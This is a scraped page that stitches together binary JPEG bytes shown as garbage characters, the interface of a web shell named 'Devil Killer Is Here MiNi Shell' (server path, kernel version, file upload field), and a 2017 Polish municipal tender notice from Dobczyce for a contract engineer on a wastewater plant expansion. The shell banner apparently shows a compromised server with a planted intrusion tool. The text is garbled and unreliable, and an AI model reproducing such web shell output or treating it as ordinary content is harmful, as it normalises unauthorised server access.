JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170411/63306-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.dobczyce.pl' target='_blank'>http://www.dobczyce.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 63306 - 2017
              z dnia 2017-04-11 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Dobczyce: Pełnienie funkcji Inżyniea Kontraku nad zadaniem "Rozbudowa Oczyszczalni Ścoeków w Dobczycach" realizowanego w ramach projeku "Uporządkowanie gospodarki ściekowej na terenie Gminy Dobczyce"     <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              nieobowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Uporząkowanie gospodarki ściekowej na terenie Giminy Dobczyce - Nr POIS.02.03.00-00-0005/16</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Dobczyce, krajowy numer identyfikacyjny
              35155542400000, ul.
              ul. Rynek 
              26,
              32410  
              Dobczyce, woj.
              małopolskie, państwo
              Polska, tel.
              123 721 700, e-mail
              ugim@dobczyce.pl, faks
              122 712 993.
              <br />
              Adres strony internetowej (URL): www.dobczyce.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Zamawiający udzielający zamówień sektorowych
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.dobczyce.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.dobczyce.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br />ul. Rynek 26, 32- 410 Dobczyce </div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Pełnienie funkcji Inżyniea Kontraku nad zadaniem "Rozbudowa Oczyszczalni Ścoeków w Dobczycach" realizowanego w ramach projeku "Uporządkowanie gospodarki ściekowej na terenie Gminy Dobczyce"     <br /><b>Numer referencyjny: </b>RI.271.163.2017.ANSU<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem niniejszego zamówienia jest usługa związana z pełnieniem funkcji Inżyniera Kontraktu nad pracami projektowymi i robotami budowlanymi wykonywanymi zgodnie z Warunkami Kontraktowymi dla Urządzeń oraz Projektowania i Budowy dla urządzeń elektrycznych i mechanicznych oraz robót inżynieryjnych i budowlanych projektowanych przez Wykonawcę" - Edycja: 4. wydanie angielsko-polskie niezmienione 2008 z erratą (tłumaczenie 1. wydania 1999), dalej zwanymi również żółty FIDIC" oraz nadzoru inwestorskiego w rozumieniu ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (tekst jednolity Dz. U. z 2016 poz. 290 z późn. zm.) nad  zadaniem pn.: Rozbudowa oczyszczalni ścieków w Dobczycach realizowanego w ramach projektu Uporządkowanie gospodarki ściekowej na terenie Gminy Dobczyce - Nr.POIS.02.03.00-00-005/16 oraz wspieranie działań Jednostki Realizującej Projekt powołanej w strukturze organizacyjnej Zamawiającego.
Zamawiający otrzymał dofinansowanie Projektu pn.: Uporządkowanie gospodarki ściekowej na terenie Gminy Dobczyce - Nr.POIS.02.03.00-00-005/16 w ramach Programu Operacyjnego Infrastruktura i Środowisko 2014-2020; Oś priorytetowa II  Ochrona Środowiska, w tym adaptacja do zmian klimatu; Działanie 2.3 Gospodarka wodno-ściekowa w aglomeracjach. 
Inwestycja prowadzona będzie na czynnym obiekcie oczyszczalni ścieków. Wykonawca robót w ramach zamówienia zapewni ciągłość pracy układu technologicznego i osadowego oczyszczalni ścieków. Ustalone zostaną z Zamawiającym przy udziale Inżyniera Kontraktu harmonogramy wyłączenia i włączenia poszczególnych obiektów i urządzeń na oczyszczalni ścieków. Wykonawca podczas wykonywania robót zobowiązany jest do zachowania na odpływie parametrów ścieków oczyszczonych zgodnych z przepisami prawa i pozwoleniem wodnoprawnym, w przeciwnym przypadku wykonawca ponosi wszelkie koszty przekroczeń parametrów ścieków
Szczegółowy opis przedmiotu zamówienia, stanowiący uzupełnienie pkt. 5 IDW, przedstawiony został w Części III niniejszej SIWZ- Opis Przedmiotu Zamówienia.
<br /><br /><b>II.5) Główny kod CPV: </b>71000000-8<br /><b> Dodatkowe kody CPV:</b>71340000-3,
                71540000-5,
                71520000-9,
                71541000-2,
                71310000-4,
                79110000-8,
                71350000-6<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje możliwość udzielenia, dotychczasowemu wykonawcy usług, zamówienia polegającego na powtórzeniu podobnych usług do wartości nieprzekraczającej 10% zamówienia pierwotnego, z zastrzeżeniem warunków wskazanych w Umowie (wzór Umowy stanowi Część II niniejszej SIWZ).<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 02/05/2017
                    data zakończenia: 31/12/2020<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Planowany okres realizacji usług Inżyniera Kontraktu przewiduje się do dnia 31.12.2020r, i zakłada poniżej wskazane etapy realizacji usług Inżyniera:
1)Etap I - mobilizacja  do 30.06.2017r tj. do dnia zakończenia procedur przetargowych zmierzających do wyłonienia wykonawców robót budowlanych. 
2)Etap II - nadzór nad realizacją Kontraktu  do dnia 31.08.2019r tj. do dnia wydania Świadectw Przejęcia dla robót realizowanych w ramach w/w kontraktu, z zastrzeżeniem, że nadzór nad projektowaniem robót powinien wynosić nie więcej niż 6 miesięcy liczone od daty zawarcia Kontraktu do daty uzyskania prawomocnego pozwolenia na budowę.
3)Etap III  rozliczenie nadzorowanego kontraktu  do dnia 31.08.2019r 
4)Etap IV Okres Zgłaszania Wad dla Robót zrealizowanych w ramach w/w Kontraktu  liczony od daty wydania Świadectwa przejęcia do daty wydania Świadectw Wykonania do dnia   31.12.2020r. 
Wskazane powyżej okresy są okresami planowanymi a ich faktyczny przebieg uzależniony będzie od rzeczywistego przebiegu realizacji nadzorowanego Kontrakt na roboty budowlane.
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Warunkiem udziału w postępowaniu jest posiadanie przez Wykonawcę ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę co najmniej 2.000.000,00 PLN.
(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie zamówienia warunek można spełniać łącznie).
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                a)Wykonawca zobowiązany jest wykazać należyte wykonanie (albo wykonywanie jeśli usługa nie została zakończona) w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie co najmniej;
- 1 usługi, której przedmiotem było pełnienie funkcji Inżyniera Kontraktu wg warunków kontraktowych FIDIC lub według warunków równoważnych dla kontraktu/ umowy na roboty budowlane z sektora ochrony środowiska o wartości kontraktu/umowy na roboty minimum 15 000 000,00 PLN netto.
oraz 
- 1 usługi, której przedmiotem było pełnienie funkcji Inżyniera Kontraktu wg warunków kontraktowych FIDIC lub według warunków równoważnych dla kontraktu/ umowy na zaprojektowanie i wykonanie robót budowlanych z sektora ochrony środowiska o wartości kontraktu/umowy na zaprojektowanie i wykonanie robót minimum 15 000 000,00 PLN netto. 
Przez warunki kontraktowe równoważne do FIDIC rozumie się wszelkie tożsame ogólne warunki i zasady dotyczące prowadzenia procesów inwestycyjnych mające odzwierciedlenie w prawie międzynarodowym, na podstawie których sporządzona została umowa na roboty budowlane np.: Warunki Kontraktowe UAV, UAV-GC (Holandia), FABI-KVV (Belgia), VOB (Niemcy), JTC lub GMP (Wielka Brytania), PRAG (Polska).	
b)Warunkiem udziału w postępowaniu jest wykazanie przez Wykonawcę, że dysponuje lub będzie dysponował co najmniej niżej wymienionymi osobami: 
Kierownik Zespołu Inżyniera Kontraktu  Inżynier Rezydent (Ekspert nr 1 - 1 osoba) niniejsza osoba ma posiadać kwalifikacje opisane szczegółowo w SIWZ
Specjalista ds. finansów i rozliczeń oraz zarządzania ryzykiem ( Ekspert nr 2  1 osoba) niniejsza osoba ma posiadać kwalifikacje szczegółowo opisane w SIWZ
Inspektor branży sanitarnej (Ekspert nr 3  1 osoba) niniejsza osoba ma posiadać kwalifikacje szczegółowo opisane  SIWZ
Inspektor branży elektroenergetycznej i AKPiA (Ekspert nr 4 - wymagana 1 osoba) niniejsza osoba ma posiadać kwalifikacje szczegółowo opisane w SIWZ 
Inspektor branży konstrukcyjno - budowlanej (Ekspert nr 5 - wymagana 1 osoba) niniejsza osoba ma posiadać kwalifikacje szczegółowo opisane w SIWZ
Inspektor branży drogowej (Ekspert nr 6 - wymagana 1 osoba) niniejsza osoba ma posiadać kwalifikacje szczegółowo opisane w SIWZ
Specjalista  technolog w zakresie oczyszczania ścieków (Ekspert nr 7 wymagana 1 osoba) niniejsza osoba ma posiadać kwalifikacje szczegółowo opisane  SIWZ
Specjalista ds. kosztorysowania i rozliczeń (ekspert nr 8 - wymagana 1 osoba) niniejsza osoba ma posiadać kwalifikacje szczegółowo opisane w SIWZ
Specjalista ds. zamówień publicznych (ekspert nr 9 - wymagana 1 osoba) niniejsza osoba ma posiadać kwalifikacje szczegółowo opisane w SIWZ
Zespół weryfikatorów dokumentacji projektowej  którego osoby powinny posiadać minimum 5 letnia praktykę zawodową w projektowaniu w niżej wymienionych specjalnościach:
-	architektonicznej, konstrukcyjno - budowlanej bez ograniczeń, sanitarnej bez ograniczeń, drogowej bez ograniczeń, elektrycznej i AKPiA bez ograniczeń, technolog w specjalności oczyszczania ścieków.

Wszystkie osoby wchodzące w skład Kluczowego Personelu muszą biegle władać językiem polskim, w przypadku, gdy którakolwiek z osób wchodzących w skład Kluczowego Personelu nie posiada biegłej znajomości języka polskiego, Wykonawca zobowiązany jest zapewnić, na własny koszt, tłumacza dla potrzeb i na okres realizacji umowy.
Uprawnienia, o których mowa powyżej powinny być zgodne z ustawą Prawo budowlane oraz Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 roku, poz. 1278). 
Dopuszcza się uprawnienia równoważne  dla osoby, która posiada uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994 roku Prawo budowlane, uprawnienia lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji w budownictwie i zachowała uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. W przypadku wykonawców zagranicznych, dopuszcza się równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art.12a ustawy Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2008, nr 63,  poz. 394 ze zm.).
Wymagane w tym punkcie okresy doświadczenia zawodowego, należy liczyć do upływu terminu składania ofert. Wymagany okres  5 letniego lub 3-letniego doświadczenia zawodowego należy rozumieć jako okres odpowiednio sześćdziesięciu lub trzydziestu szczęściu miesięcy  w nadzorowaniu lub kierowaniu robotami w trakcie faktycznej realizacji robót. Dane te powinny jasno wynikać z treści ujawnianej w załączniku do oferty zawierającym informację o osobach - Ekspertach, dlatego wymaga się podania dat rozpoczęcia i zakończenia robót, które nadzorował lub którymi kierował dany Ekspert. Wykazanie różnych usług lub robót przebiegających w tym samym okresie czasu, którymi kierował dany ekspert zostanie potraktowane, jak wykonanie jednej usługi/czynności w danym okresie czasu, innymi słowy przyjmuje się, iż zdublowane okresy doświadczania zawodowego nie podlegają sumowaniu. 
Wszystkie wymienione powyżej, osoby winny posiadać biegłą znajomość języka polskiego. Zamawiający dopuszcza zmianę tego wymogu wyłącznie w przypadku, gdy Wykonawca na własny koszt zapewni tłumacza języka polskiego, który zapewni stałe i biegłe tłumaczenie  w kontaktach pomiędzy Zamawiającym a personelem Wykonawcy, a także zapewni tłumaczenie na bieżąco wszystkich dokumentów związanych z realizacją przedmiotowego zamówienia, stworzonych zarówno przez Wykonawcę, jak i dostarczonych przez Zamawiającego. Wykonawca zatrudniając tłumacza winien wziąć pod uwagę, iż z uwagi na złożony zakres przedmiotu zamówienia, tłumacz ten winien być biegły w bezbłędnym i jednoznacznym tłumaczeniu zagadnień technicznych, ekonomicznych i prawnych.
Lista wymienionych specjalistów stanowi minimum osobowe. Wykonawca zobowiązany jest zapoznać się szczegółowo z przedmiotem zamówienia, tak aby zapewnić na stanowiskach kluczowych specjalistów osoby uprawnione do pełnienia samodzielnych funkcji technicznych w branżach i zakresie gwarantującym wykonanie wszelkich prac ujętych w opisie przedmiotu zamówienia. Wykonawca powinien zapewnić kluczowym specjalistom niezbędne wsparcie i pomoc techniczną ze strony innych specjalistów, która może być niezbędna do wykonania kontraktu, np. poza wskazanymi w ofercie kluczowymi specjalistami należy zapewnić m.in. Zespół projektantów w branżach wchodzących w zakres przedmiotu zamówienia. Wynagrodzenie ww. personelu musi zostać uwzględnione w cenie ofertowej. Wykonawca ponosi pełną odpowiedzialność za dobór personelu dodatkowego, posiadanie potencjału technicznego.
Zamawiający bezwzględnie wymaga zatrudnienia przez Wykonawcę, na podstawie umowy o pracę osobę wykonującą prace na stanowisku Kierownika Zespołu Inżyniera Kontraktu  Inżyniera Rezydenta ( Eksperta Nr 1).
Zamawiający zastrzega sobie prawo kontroli formy zatrudnienia osoby wykonującej prace na stanowisku Kierownika Zespołu Inżyniera Kontraktu  Inżyniera Rezydenta ( Eksperta Nr 1) poprzez przedstawienie dowodów przez Wykonawcę, że osoba wykonująca usługę posiada stosowny status zatrudnienia.

Zamawiający dopuszcza pełnienie przez 1 osobę więcej niż jednej funkcji w przypadku posiadania stosownych uprawnień.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1.W celu potwierdzenia spełniania warunków udziału w postępowaniu oraz braku podstaw do wykluczenia Wykonawca złoży wymagane przez Zamawiającego oświadczenia oraz dokumenty w tym aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia oraz oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez Zamawiającego  wg wzoru stanowiącego załącznik nr 2 do niniejszej IDW. 
2.Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania spełniania warunków udziału w postępowaniu, w zakresie, w jakim powołuje się na ich zasoby, przedstawi stosowne oświadczenie/zobowiązanie tych podmiotów o udostępnieniu zasobów wg wzoru stanowiącego załącznik nr 3 do niniejszej IDW. 
3.W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenia, o których mowa w pkt. 2 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.
Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.
4.W celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawca:
1)w zakresie sytuacji ekonomicznej lub finansowej złoży:
Dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną:
-co najmniej 2.000.000,00 PLN , aktualny na dzień złożenia dokumentu,
(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców 
o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja finansowa i ekonomiczna, przy czym nie jest wymagane złożenie tych dokumentów przez wszystkich Wykonawców a jedynie przez tego który spełnia dany warunek, bądź przyczynia się do jego spełnienia).
2)w zakresie zdolności technicznej lub zawodowej złoży:
a)wykaz usług (potwierdzających spełnianie warunku) wykonanych, 
a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, 
